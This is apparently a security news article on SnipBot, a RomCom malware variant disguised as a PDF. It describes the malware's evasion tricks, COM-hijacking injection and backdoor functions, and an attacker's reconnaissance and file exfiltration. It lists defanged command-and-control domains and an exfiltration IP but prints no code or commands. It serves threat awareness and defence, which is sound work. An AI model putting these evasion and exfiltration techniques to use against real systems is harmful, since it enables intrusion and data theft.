Hackers are increasingly weaponizing PDF files to deliver malware and carry out cyberattacks.
They exploit the all-presence and trustworthiness of PDFs to trick victims into opening malicious files that can contain malicious links, embedded code, or vulnerabilities that allow remote code execution.
Security experts at Palo Alto Networks identified recently that hackers have been actively weaponizing PDF files to deliver new SnipBot malware.
Hackers Weaponizing PDF Files
SnipBot is a newly discovered variant of the “RomCom” malware family which was identified in April 2024 by Palo Alto Networks’ Advanced WildFire sandbox.
This sophisticated threat is designated as “RomCom 5.0,” and it combines features from-
- RomCom 3.0
- PEAPOD (RomCom 4.0)
While the SnipBot employs a multi-stage infection process that begins with a signed executable which is disguised as a “PDF.”
This uses the anti-sandbox techniques like “checking process names” and “registry entries.”
To evade the detection the malware makes use of “Window message-based control-flow obfuscation” and “encrypted strings.”
Besides this, it downloads additional payloads like a DLL that injects code into Explorer.exe through “COM hijacking.”
The core functionality of SnipBot includes ‘a backdoor (single.dll)’ that creates a “SnipMutex” and enables threat actors to ‘execute commands,’ ‘upload/download files,’ and ‘deploy extra modules.’
Initially, the malware communicates with command and control (C2) servers using the domains like “xeontime[. ]com” and “drvmcprotect[. ]com.”
While the earlier versions of the malware used different tactics like ‘fake Adobe font installers’ and ‘C2 domains’ like ilogicflow[. ]com and webtimeapi[. ]com.
The ongoing sophistication of cyber threats is illustrated by the evolution of the SnipBot.
As the SnipBot, various evasion techniques, payload delivery methods, and post-infection capabilities compromise systems and exfiltrate sensitive data.
Analysis of SnipBot’s post-infection activity, tracked via Cortex XDR telemetry, revealed a sophisticated attack sequence lasting about four hours on April 4.
The attacker, using the command-line functionality of SnipBot’s main module (single.dll), first conducted network reconnaissance to identify the domain controller.
They then attempted to exfiltrate files from the victim’s documents, downloads, and OneDrive folders to a server at 91.92.250[.]104.
The attacker employed tools like AD Explorer and WinRAR (renamed as fsutil.exe) for discovery and file compression while using PuTTY Secure Copy client (renamed as dsutil.exe) for data transfer.
The targeted file types included the standard system files and unusual health-related formats (ZBF, DCM).
Even though there were problems, evidenced by attempts to kill the PuTTY process, the attacker continued to the end and installed “config-pdf.dll,” which had been downloaded from xeontime[. ]com, and sought commands at cethernet[. ]com.
The attack concluded with an attempt to snapshot the local Active Directory database and archive files from c:essential.
This comprehensive approach, combining custom malware (SnipBot), living-off-the-land techniques, and targeted data exfiltration, suggests a possible shift from financial motives to espionage, as noted by CERT-UA’s findings on the threat actor.
Analyse Any Suspicious Links Using ANY.RUN’s New Safe Browsing Tool: Try It for Free